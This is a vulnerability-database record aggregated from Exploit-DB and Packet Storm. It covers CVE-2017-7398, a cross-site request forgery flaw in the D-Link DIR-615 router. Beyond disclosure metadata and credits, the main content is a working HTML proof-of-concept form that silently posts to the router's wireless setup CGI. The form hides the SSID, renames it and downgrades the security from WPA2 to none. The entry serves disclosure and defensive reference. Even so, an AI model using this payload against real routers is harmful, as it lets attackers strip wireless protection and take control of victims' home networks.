ID

VAR-E-201704-0206


CVE

cve_id:CVE-2017-7398

Trust: 1.5

sources: PACKETSTORM: 141924 // EXPLOIT-DB: 41821

EDB ID

41821


TITLE

D-Link DIR-615 - Cross-Site Request Forgery - Hardware webapps Exploit

Trust: 0.6

sources: EXPLOIT-DB: 41821

DESCRIPTION

D-Link DIR-615 - Cross-Site Request Forgery. CVE-2017-7398 . webapps exploit for Hardware platform

Trust: 0.6

sources: EXPLOIT-DB: 41821

AFFECTED PRODUCTS

vendor:d linkmodel:dir-615scope: - version: -

Trust: 2.1

sources: PACKETSTORM: 141924 // EXPLOIT-DB: 41821 // EDBNET: 92418

EXPLOIT

Title:
====

D-Link DIR 615 HW: T1 FW:20.09 is vulnerable to Cross-Site Request Forgery (CSRF) vulnerability

Credit:
======

Name: Pratik S. Shah

Reference:
=========

CVE Details: CVE-2017-7398.

Date:
====

1-04-2017

Vendor:
======

D-Link wireless router

Product:
=======

DIR-615

http://www.dlink.co.in/products/?pid=678

Affected Version:
=============

Hardware: T1 , Firmware: 20.09

Abstract:
=======

This enables an attacker to perform an unwanted action on a wireless router for which the user/admin is currently authenticated.

Attack Type:
===================

Remote

Details:
=========

CSRF vulnerability in D-link DIR 615 wireless router enables an attacker to perform unwanted actions on router, which may lead to gaining full control of the device.

Proof Of Concept:
================

1) User login to D-link DIR 615 wireless router

2) User visits the attacker's malicious web page (DlinkCSRF.html)

3) DlinkCSRF.html exploits CSRF vulnerability and changes the Security Options to None

This is the CSRF POC for changing the Security option from WPA2 to None( Parameter: Method)

Attacker can also tamper following parameters

hiddenSSID
SSID
Passwords for all the applicable security options

<html>

<!-- CSRF PoC - D-link DIR 615 HW:T1 FW:20.09 -->

<body>

<form action="http://192.168.0.1/form2WlanBasicSetup.cgi" method="POST">

<input type="hidden" name="domain" value="1" />

<input type="hidden" name="hiddenSSID" value="on" />

<input type="hidden" name="ssid" value=“Hacked” />

<input type="hidden" name="band" value="10" />

<input type="hidden" name="chan" value="0" />

<input type="hidden" name="chanwid" value="1" />

<input type="hidden" name="txRate" value="0" />

<input type="hidden" name="method&#95;cur" value="6" />

<input type="hidden" name="method" value="0" />

<input type="hidden" name="authType" value="1" />

<input type="hidden" name="length" value="1" />

<input type="hidden" name="format" value="2" />

<input type="hidden" name="defaultTxKeyId" value="1" />

<input type="hidden" name="key1" value="0000000000" />

<input type="hidden" name="pskFormat" value="0" />

<input type="hidden" name="pskValue" value=“CSRF@test” />

<input type="hidden" name="checkWPS2" value="1" />

<input type="hidden" name="save" value="Apply" />

<input type="hidden" name="basicrates" value="15" />

<input type="hidden" name="operrates" value="4095" />

<input type="hidden" name="submit&#46;htm&#63;wlan&#95;basic&#46;htm" value="Send" />

<input type="submit" value="Submit request" />

</form>

</body>

</html>

Disclosure Timeline:
======================================
Vendor Notification: 6th March 2017

Trust: 1.0

sources: EXPLOIT-DB: 41821

EXPLOIT LANGUAGE

txt

Trust: 0.6

sources: EXPLOIT-DB: 41821

PRICE

free

Trust: 0.6

sources: EXPLOIT-DB: 41821

TYPE

Cross-Site Request Forgery

Trust: 1.6

sources: EXPLOIT-DB: 41821 // EDBNET: 92418

TAGS

tag:exploit

Trust: 0.5

tag:csrf

Trust: 0.5

sources: PACKETSTORM: 141924

CREDITS

Pratik S. Shah

Trust: 0.6

sources: EXPLOIT-DB: 41821

EXTERNAL IDS

db:EXPLOIT-DBid:41821

Trust: 1.6

db:NVDid:CVE-2017-7398

Trust: 1.5

db:EDBNETid:92418

Trust: 0.6

db:PACKETSTORMid:141924

Trust: 0.5

sources: PACKETSTORM: 141924 // EXPLOIT-DB: 41821 // EDBNET: 92418

REFERENCES

url:https://nvd.nist.gov/vuln/detail/cve-2017-7398

Trust: 1.5

url:https://www.exploit-db.com/exploits/41821/

Trust: 0.6

sources: PACKETSTORM: 141924 // EXPLOIT-DB: 41821 // EDBNET: 92418

SOURCES

db:PACKETSTORMid:141924
db:EXPLOIT-DBid:41821
db:EDBNETid:92418

LAST UPDATE DATE

2022-07-27T09:21:29.160000+00:00


SOURCES RELEASE DATE

db:PACKETSTORMid:141924date:2017-04-05T04:02:22
db:EXPLOIT-DBid:41821date:2017-04-05T00:00:00
db:EDBNETid:92418date:2017-04-05T00:00:00